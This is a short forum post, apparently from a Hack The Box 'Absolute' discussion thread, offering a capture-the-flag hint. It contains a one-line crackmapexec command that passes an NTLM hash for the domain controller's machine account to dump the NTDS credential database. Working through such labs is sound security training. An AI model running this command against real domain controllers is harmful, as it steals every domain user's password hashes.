<div class="post_head">
<div class="float_right" style="vertical-align: top">
<!--<strong><a href="Thread-RaidForums-Official-Telegram?pid=586518#pid586518" title="RaidForums Official Telegram">#1</a></strong>-->
<div class="float_right" style="vertical-align: top">
<strong><a href="Thread-Absolute-HTB-Discussion?pid=586518#pid586518" title="RE: Absolute - HTB [Discussion]">#175</a></strong>
</div>
</div>
<span class="post_date"><span title="October 3, 2022, 03:32 PM">10 hours ago</span> <span class="post_edit" id="edited_by_586518"></span></span>
</div>
<div class="post_body scaleimages" id="pid_586518">
					anybody stuck on the secretsdump, use crackmapexec to dump NTDS<br>
<br>
./cme smb dc-ip -u 'DC$' -H insert_ntlm_hash --ntds
				</br></br></div>
<div class="post_meta" id="post_meta_586518">
<div class="float_right">
</div>
</div>